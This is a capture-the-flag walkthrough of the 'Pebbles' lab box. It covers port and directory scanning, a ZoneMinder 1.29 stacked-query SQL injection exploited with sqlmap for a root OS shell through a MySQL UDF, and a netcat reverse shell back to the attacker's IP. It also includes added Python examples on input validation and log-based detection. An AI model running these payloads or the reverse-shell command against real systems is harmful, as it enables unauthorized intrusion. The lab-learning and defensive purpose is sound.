Pebbles

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 02:25 EST
Nmap scan report for 192.168.215.52
Host is up, received reset ttl 61 (0.23s latency).
Scanned at 2025-11-07 02:25:03 EST for 52s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
|   256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

We have FTP on 21, SSH on 22, and three ports running HTTP (80, 3305 and 8080).

HTTP (8080):

Just the Tomcat welcome page, with nothing functional behind it.

HTTP (3305):

The same for Tomcat.

HTTP (80):

I tried default credentials and SQL injection, but nothing worked.

Let's try directory fuzzing:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ gobuster dir -u http://192.168.215.52/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.215.52/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/cgi-bin/             (Status: 403) [Size: 279]
/cgi-bin/.php         (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://192.168.215.52/css/]
/images               (Status: 301) [Size: 317] [--> http://192.168.215.52/images/]
/index.php            (Status: 200) [Size: 1134]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.215.52/javascript/]
/server-status        (Status: 403) [Size: 279]
/zm                   (Status: 301) [Size: 313] [--> http://192.168.215.52/zm/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================

We find an unusual directory named zm; browsing to it:

It hosts a service called ZoneMinder, with its version (1.29) exposed on the page.

Exploitation:

Let's search for public exploits for that version:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]                                                                                                                   
└─$ searchsploit zoneminder 1.29                                                                                                                                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path                           
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery                              | php/webapps/41239.txt           
ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE                                                                                     | php/webapps/51902.py            
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Mirror the first one locally:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ searchsploit -m php/webapps/41239.txt
  Exploit: Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
      URL: https://www.exploit-db.com/exploits/41239
     Path: /usr/share/exploitdb/exploits/php/webapps/41239.txt
    Codes: N/A
 Verified: False
File Type: HTML document, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Pebbles/41239.txt

Let's inspect the file:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ cat 41239.txt
<snipped>

2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.
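The advisory entry above describes the bug class precisely: the `limit` value from the POST body is pasted into a SQL statement, and the driver executes stacked (`;`-separated) statements, so a value like `100;(SELECT ...)` runs a second query. The following is an added example, not code from the writeup or from ZoneMinder: a hypothetical log handler that reproduces that pattern, beside a hardened version that allow-lists the parameter and binds it. It uses an in-memory SQLite database (whose `executescript` stands in for a multi-statement MySQL driver) with constructed sample rows; the table, column and function names are mine.

```python
"""Unsafe vs. hardened handling of a numeric `limit` request parameter.

Added example (not from the writeup or ZoneMinder). Table `logs` and the
sample rows are constructed; SQLite is used so it runs offline.
"""
import re
import sqlite3

# Constructed sample rows: (time, level, message)
SAMPLE_LOGS = [
    (1.0, "INF", "zmc: monitor 1 started"),
    (2.0, "WAR", "zmc: frame drop"),
    (3.0, "ERR", "zma: analysis failed"),
]

# Constructed stacked-query payload used to show the impact of the unsafe path.
STACKED_PAYLOAD = "100; DELETE FROM logs"
# Payload shape from the advisory (SLEEP is MySQL-only; here it is only
# shown being rejected by the validator).
ADVISORY_PAYLOAD = "100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#"


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logs (time REAL, level TEXT, message TEXT)")
    conn.executemany("INSERT INTO logs VALUES (?, ?, ?)", SAMPLE_LOGS)
    conn.commit()
    return conn


def row_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM logs").fetchone()[0]


def query_logs_unsafe(conn: sqlite3.Connection, raw_limit: str) -> int:
    """The vulnerable pattern: request text goes straight into the SQL
    string and is run by an executor that accepts several statements.
    Returns the number of rows left afterwards, which exposes the side
    effect of an injected second statement."""
    sql = f"SELECT time, level, message FROM logs ORDER BY time LIMIT {raw_limit}"
    conn.executescript(sql)  # runs every ';'-separated statement in `sql`
    return row_count(conn)


def parse_limit(raw: str, max_limit: int = 1000) -> int:
    """Strict allow-list: a short run of ASCII digits within bounds.
    Anything else is rejected before it can reach the database."""
    if not re.fullmatch(r"[0-9]{1,6}", raw):
        raise ValueError(f"invalid limit: {raw!r}")
    n = int(raw)
    if not 1 <= n <= max_limit:
        raise ValueError(f"limit out of range: {n}")
    return n


def limit_is_valid(raw: str) -> bool:
    try:
        parse_limit(raw)
        return True
    except ValueError:
        return False


def query_logs_safe(conn: sqlite3.Connection, raw_limit: str) -> list:
    """Hardened handler: validate, then bind. The SQL text never changes,
    so there is no statement boundary for an attacker to reach."""
    n = parse_limit(raw_limit)
    return conn.execute(
        "SELECT time, level, message FROM logs ORDER BY time LIMIT ?", (n,)
    ).fetchall()


if __name__ == "__main__":
    print("unsafe, honest input :", query_logs_unsafe(make_db(), "100"), "rows remain")
    print("unsafe, stacked input:", query_logs_unsafe(make_db(), STACKED_PAYLOAD), "rows remain")
    print("safe, honest input   :", query_logs_safe(make_db(), "2"))
    for p in (STACKED_PAYLOAD, ADVISORY_PAYLOAD):
        print("safe rejects", repr(p), ":", not limit_is_valid(p))
```

Both layers matter: the allow-list rejects the payload outright and the bound parameter means that even a validator bug cannot change the statement structure. Limiting the maximum value also caps the cost of a legitimate but oversized request.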

Let's use sqlmap to confirm the injection and, if the database user is privileged enough, use it to get a shell on the target:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]                                                                                                                   
└─$ sqlmap http://192.168.215.52:8080/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell                                             
        ___                                                                                                                                                                
       __H__                                                                                                                                                               
 ___ ___[(]_____ ___ ___  {1.9.10#stable}                                                                                                                                  
|_ -| . [)]     | .'| . |                                                                                                                                                  
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org
      
<snipped>

[02:46:52] [INFO] POST parameter 'limit' appears to be 'MySQL >= 5.0.12 stacked queries (comment)'' injectable

<snipped>

sqlmap identified the following injection point(s) with a total of 2326 HTTP(s) requests:
---
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5 
---
[02:47:57] [INFO] the back-end DBMS is MySQL
[02:47:57] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:47:58] [INFO] fingerprinting the back-end DBMS operating system
[02:47:58] [INFO] the back-end DBMS operating system is Linux
[02:47:59] [INFO] testing if current user is DBA
[02:47:59] [INFO] fetching current user
[02:47:59] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 

[02:48:19] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit

Select 2:

> 2
[02:49:30] [INFO] checking if UDF 'sys_exec' already exist
[02:49:30] [INFO] checking if UDF 'sys_eval' already exist
[02:49:30] [INFO] detecting back-end DBMS version from its banner
[02:49:30] [INFO] retrieved: 5.7.30-0ubuntu0.16.0
<snipped>
[02:57:12] [INFO] the local file '/tmp/sqlmapgcef_yle12662/lib_mysqludf_sys2loln42s.so' and the remote file '/usr/lib/mysql/plugin/libsbvjw.so' have the same size (8040 B)
[02:57:13] [INFO] creating UDF 'sys_exec' from the binary UDF file
[02:57:13] [INFO] creating UDF 'sys_eval' from the binary UDF file
[02:57:14] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[02:57:14] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[04:27:52] [INFO] retrieved: root

So the database user is root@localhost and mysqld itself runs as the OS root user; that combination is what let sqlmap write its UDF library into /usr/lib/mysql/plugin and hand us an os-shell as root.
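The sqlmap output above is a textbook UDF chain: locate the plugin directory, write a shared object into it, `CREATE FUNCTION ... SONAME` the helpers, then call `sys_eval`/`sys_exec`. Every step is a distinct SQL statement, so a MySQL server with `general_log=ON` records the whole sequence. As an added example (not part of the writeup), the scanner below runs a few signature rules over constructed general-log lines modelled on that chain; the library name `libsbvjw.so` is the one sqlmap reported above, the log lines, rule names and function names are mine, and the threshold for "high risk" is an assumption.

```python
"""Flag UDF-style command execution in MySQL general_log lines.

Added example, not from the writeup. Log lines below are constructed
(MySQL 5.7 general_log layout: time, thread id, command, argument).
"""
import re
from dataclasses import dataclass

# Constructed sample log. 0x7F454C46... is the ELF magic a UDF upload
# would start with; the .so name is the one sqlmap reported on this box.
SAMPLE_GENERAL_LOG = """\
2025-11-07T07:46:52.101Z\t   12 Query\tSELECT * FROM Logs WHERE TimeKey > 5 ORDER BY TimeKey DESC LIMIT 100
2025-11-07T07:46:53.220Z\t   12 Query\tSELECT * FROM Logs WHERE TimeKey > 5 ORDER BY TimeKey DESC LIMIT 100;SELECT SLEEP(5)#
2025-11-07T07:49:31.004Z\t   13 Query\tSELECT @@plugin_dir
2025-11-07T07:57:12.330Z\t   14 Query\tSELECT 0x7F454C4602010100 INTO DUMPFILE '/usr/lib/mysql/plugin/libsbvjw.so'
2025-11-07T07:57:13.010Z\t   14 Query\tCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'libsbvjw.so'
2025-11-07T07:57:13.012Z\t   14 Query\tCREATE FUNCTION sys_eval RETURNS STRING SONAME 'libsbvjw.so'
2025-11-07T09:27:52.500Z\t   14 Query\tSELECT sys_eval('whoami')
2025-11-07T09:28:00.000Z\t   15 Connect\troot@localhost on zm using Socket
"""

# (rule name, severity, pattern) -- names and severities are mine.
RULES = [
    ("udf-create", "high",
     re.compile(r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\b.*\bSONAME\b", re.I)),
    ("file-write", "high", re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\b", re.I)),
    ("udf-call", "high", re.compile(r"\bsys_(?:exec|eval)\s*\(", re.I)),
    ("plugin-dir-recon", "medium", re.compile(r"@@(?:global\.)?plugin_dir\b", re.I)),
    ("stacked-sleep", "medium", re.compile(r";.*\bSLEEP\s*\(", re.I)),
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")


@dataclass
class Finding:
    line_no: int
    thread: int
    rule: str
    severity: str
    statement: str


def scan_general_log(text: str) -> list:
    """Return one Finding per (line, rule) match, in log order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m or m.group("cmd") not in ("Query", "Execute"):
            continue  # only SQL-carrying commands are of interest here
        stmt = m.group("arg")
        for name, severity, pattern in RULES:
            if pattern.search(stmt):
                findings.append(Finding(line_no, int(m.group("thread")),
                                        name, severity, stmt))
    return findings


def high_risk_threads(findings: list) -> set:
    """Connections (thread ids) that produced at least one high-severity hit."""
    return {f.thread for f in findings if f.severity == "high"}


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_GENERAL_LOG):
        print(f"line {f.line_no:>2} thread {f.thread} [{f.severity:6}] {f.rule:17} {f.statement[:60]}")
    print("high-risk threads:", sorted(high_risk_threads(scan_general_log(SAMPLE_GENERAL_LOG))))
```

Detection is the fallback; the primary fixes are not letting mysqld run as root, giving the web application a database account without FILE or SUPER, and pointing `secure_file_priv` away from the plugin directory so `INTO DUMPFILE` cannot land a library there in the first place. Any one of those would have stopped the chain shown above.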

Let's get an interactive shell.

Start a netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...
os-shell> busybox nc 192.168.45.174 3305 -e bash
do you want to retrieve the command standard output? [Y/n/a] Y
[04:42:58] [INFO] retrieved:  
command standard output: ' '
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.52] 54738

Here we have a connection back from the target.

Since we are already root, let's grab the root flag:

whoami
root
cd /root
ls
proof.txt
cat proof.txt
d135189cae5eef88d3fd1ce69894ec6a
